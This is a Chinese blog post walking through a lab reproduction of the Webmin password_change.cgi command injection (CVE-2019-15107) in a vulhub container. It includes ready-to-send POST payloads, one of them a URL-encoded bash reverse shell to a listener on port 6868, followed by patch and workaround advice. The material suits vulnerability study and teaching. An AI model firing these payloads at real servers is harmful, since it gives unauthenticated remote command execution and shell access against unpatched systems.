【漏洞复现】Webmin 远程命令执行(CVE-2019-15107)

于 2023-11-05 14:04:44 发布
阅读量565 收藏
点赞数
分类专栏: # 漏洞复现 文章标签: webmin 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zhaosong_/article/details/134229591
版权

感谢互联网提供分享知识与智慧,在法治的社会里,请遵守有关法律法规

文章目录

说明内容
漏洞编号CVE-2019-15107
漏洞名称Webmin 远程命令执行
漏洞评级
影响范围Webmin<=1.920
漏洞描述该漏洞由于password_change.cgi文件在重置密码功能在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。
修复方案

1.1、漏洞描述

Webmin的是一个用于管理类Unix的系统的管理配置工具,具有网络页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。它已知在端口10000上运行。

该漏洞由于password_change.cgi文件在重置密码功能在重置密码功能中发现了一个错误,该错误允许恶意第三方由于缺少输入验证而执行恶意代码。

1.2、漏洞等级

1.3、影响版本

Webmin<=1.920

1.4、漏洞复现

1、基础环境

Path:vulhub/webmin/CVE-2019-15107

启动测试环境:

sudo docker-compose up -d

访问https://your-ip:10000/即可看到

在这里插入图片描述

2、漏洞验证

直接访问https://your-ip:10000/password_change.cgi

在这里插入图片描述

抓包后修改如下POC即可

POST /password_change.cgi HTTP/1.1
Host: your-ip:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://your-ip:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 60

user=rootxx&pam=&expired=2&old=test|ls&new1=test2&new2=test2

上面poc需要注意:ip改成自己的ip,然后user参数不能是系统账户,后面接执行的命令。

在这里插入图片描述

命令执行成功

也可以使用HackBar插件执行

在这里插入图片描述

1.5、深度利用

1、反弹Shell
bash -c "bash -i >& /dev/tcp/192.168.8.8/6868 0>&1"

进行url编码

在这里插入图片描述

Kali监听6868端口,BurpSuite发送数据包,进行反弹

POST /password_change.cgi HTTP/1.1
Host: 192.168.8.8:10000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: redirect=1; testing=1; sid=x; sessiontest=1
Referer: https://192.168.8.8:10000/session_login.cgi
Content-Type: application/x-www-form-urlencoded
Content-Length: 141

user=rootxx&pam=&expired=2&old=test|bash%20-c%20%22bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.8.8%2F6868%200%3E%261%22&new1=test2&new2=test2

反弹成功!

在这里插入图片描述

1.6、修复建议

目前Webmin官方已发布最新版 修复了该漏洞,请受影响的用户尽快升级至最新版本:

下载链接:http://webmin.com/download.html

临时解决方案:

1.900 到 1.920版本的用户,编辑Webmin配置文件:/etc/webmin/miniserv.conf,注释或删除“passwd_mode=”行,然后运行/etc/webmin/restart 重启服务命令。

注:修复漏洞前请将资料备份,并进行充分测试。

1.7、参考链接

  • https://qftm.github.io/2020/10/25/CVE-2019-15107-Webmin-RCE-Backdoor/#toc-heading-6
  • https://vulhub.org/#/environments/webmin/CVE-2019-15107/
过期的秋刀鱼-
关注
专栏目录
CVE-2019-15107 Webmin远程命令执行漏洞复现
墨痕诉清风的博客
11-05 632
在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。根据最新消息,该应用在官方提供的sourceforge下载的源码才包含这个漏洞,而官方Github上的代码是安全的。在sourceforge上下载,链接如下。这里的user值要是用的是一个假的用户,使用真实的root测试不成功,只有在发送的用户参数的值不是已知的Linux用户的情况下(而参考链接中是user=root123),展示进入才会到修改/etc/shadow的地方,触发命令注入漏洞。查看response。.
Webmin 远程命令执行漏洞CVE-2019-15107漏洞复现
s1056481432的博客
08-19 1135
漏洞介绍 Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可 以执行任意系统命令漏洞环境 在vulhub执行如下命令,启动webmin 1.910: docker-compose up -d 执行完成后,访问https://your-ip:10000,忽略证书后即可看到webmin的登录页面。 漏洞复现 参考链接中的数据包是不对的,经过阅读代码可知,只有在发送的user参数的值不是已知Linux用户的情况
webmin远程命令执行漏洞(CVE-2019-15107)
weixin_51387754的博客
10-22 2039
简介(what and why) Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 http://www.webmin.com/ Webmin 是一个用 Perl 编写的基于浏览器的管理应用程序。 是一个基于Web的界面,用于Unix的系统管理。使用任何支持表和表单的浏览器,可以设置用户帐户,Apache,DNS,文件共享等。 HOW:Linux系统因其高效稳定而受到广大用户的推崇与青睐,然后其管理有一定复杂性和学习周期。为了
Webmin 远程命令执行漏洞
jammny
01-16 1504
前言: Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。 影响版本: Webmin <= 1.920 漏洞代码: def peer "#{ss1 ? 'https:// : ' http://' }#{rhost}:#{rport}" end # Targe...
webmin 远程命令执行CVE-2019-15107漏洞复现
weixin_42675091的博客
09-06 468
webmin 远程命令执行CVE-2019-15107漏洞复现
webmin 远程命令执行CVE-2019-15107复现
YouthBelief的博客
11-11 1231
Webmin漏洞前言webmin 远程命令执行CVE-2019-15107)0x01 漏洞描述0x02 影响范围0x03 漏洞复现命令执行0x04 漏洞修复 前言 WebminWebmin社区的一套基于Web的用于类Unix操作系统中的系统管理工具。 webmin 远程命令执行CVE-2019-15107) 0x01 漏洞描述 Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无
Webmin (CVE-2019-15107) 远程命令执行漏洞复现
来日可期的博客
10-13 1041
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。在其找回密码页面中,存在一处无需权限的命令注入漏洞,通过这个漏洞攻击者即可以执行任意系统命令。访问https://127.0.0.1:10000/password_change.cgi。然后发送数据包后,可以看到在页面的回显中,出现了我们插入的id命令的结果。还可以使用HackBar,发送POST请求包,并添加攻击Payload。访问靶场地址https://127.0.0.1:10000/漏洞影响版本为Webmin
Webmin 远程命令执行漏洞CVE-2019-15107
m0_57206390的博客
10-25 442
Webmin是一个用于管理类Unix系统的管理配置工具,具有Web页面。 该漏洞由于password_change.cgi文件在重置密码功能中存在一个代码执行漏洞,该漏洞允许恶意第三方在缺少输入验证的情况下而执行恶意代码。
Webmin远程命令执行漏洞(CVE-2019-15107 )复现
玄道的网安博客
09-28 623
简介 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作 影响版本 Webmin <= 1.920 环境搭建 下载地址 https://sourceforge.net/projects/webadmin/files/webmin/1.920/ 在这里,我们下载deb安装包,然后用 dpkg -i webmin_1.920_all.deb进行安装 安装前可能需要一些依赖,我们这里闲安装依赖..
CVE-2019-15107Webmin远程命令执行漏洞复现
Blog of Jaoing
04-26 501
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。 Webmin 1.920及之前版本中的password_change.cgi存在命令注入漏洞。该漏洞源于外部输入数据构造可执行命令过程中,网络系统或产品未正确过滤其中的特殊元素。攻击者可利用该漏洞执行非法命令......
webmin 远程代码执行CVE-2019-15642)
weixin_42675091的博客
09-05 451
webmin 远程代码执行CVE-2019-15642)
CVE-2019-15107
公众号shadow sock7
08-19 1341
漏洞存在于webmin的重置密码功能处,(但是默认重置密码功能并未开启)。只需要用|就可以进行命令执行: shodan上全球有14000多 shodan上中国的只有78 参考: https://blog.firosolutions.com/exploits/webmin/ https://www.reddit.com/r/netsec/comments/crk77z/0day_remote_...
webmin远程命令执行漏洞(cve-2019-15107)深入分析
whatday的专栏
06-27 2215
漏洞描述 近日Webmin被发现存在一处远程命令执行漏洞,经过分析后,初步猜测其为一次后门植入事件。 Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。 漏洞分析 首先分析msf给出的插件 根据插件,还原出poc如下: 当poc执行后,会向p.
漏洞复现——Webmin 远程命令执行CVE-2019-15107
lay77的博客
10-12 217
Webmin是一款基于Web远程管理工具,该工具存在一个远程命令执行漏洞CVE-2019-15107)。攻击者可以通过特制的请求,未经身份验证的情况下执行任意命令,并可能导致服务器被完全控制。禁用或限制Webmin远程访问,仅允许访问来自受信任的IP地址。尽快更新Webmin版本至1.930或更高版本,以修复该漏洞。配置Web服务器强制使用HTTPS加密连接,并使用安全证书。使用防火墙规则,限制对Webmin的访问仅来自内部网络。Webmin版本:1.920及之前的版本。此漏洞报告无附带文件。
CVE-2019-15107 webmin RCE漏洞复现
永远是少年
12-10 1022
今天继续给大家介绍渗透测试相关知识,本文主要内容是CVE-2019-15107 webmin RCE漏洞复现。 一、CVE-2019-15107 webmin RCE漏洞简介与环境搭建 二、CVE-2019-15107 webmin RCE实战
CVE-2019-15107 Webmin远程命令执行漏洞复现 (文末EXP)
Vitaminapple的博客
06-03 1118
CVE-2019-15107 Webmin远程命令执行漏洞复现 1 环境搭建 1.1 Vulhub靶机搭建 1.1.1 环境安装 (1)安装docker $ curl -fsSL https://get.docker.com | bash -s docker --mirror Aliyun (2)安装Docker-Compose $ pip install docker-compose #如果没有pip需要先安装 $ yum -y install epel-release $ yum -y inst
Webmin远程命令执行漏洞(CVE-2019-15107)复现
qq_24481913的博客
08-01 298
Webmin是目前功能最强大的基于Web的Unix系统管理工具。管理员通过浏览器访问Webmin的各种管理功能并完成相应的管理动作。据统计,互联网上大约有13w台机器使用Webmin。当用户开启Webmin密码重置功能后,攻击者可以通过发送POST请求在目标系统中执行任意命令,且无需身份验证。
cve-2015-20107漏洞修复
最新发布
12-08
根据引用[1]和引用提供的信息,CVE-2019-15107webmin系统存在的RCE漏洞编号。为了修复该漏洞,需要升级webmin版本至1.930或以上。具体修复步骤如下: 1.登录webmin系统,进入“Webmin Configuration”页面。 2.在“Webmin Configuration”页面中,选择“Upgrade Webmin”选项卡。 3.在“Upgrade Webmin”选项卡中,点击“Check for Updates”按钮,检查是否有可用的更新。 4.如果有可用的更新,点击“Upgrade Webmin Now”按钮,进行升级。 5.升级完成后,重新启动webmin服务,以确保更新生效。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

过期的秋刀鱼-

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值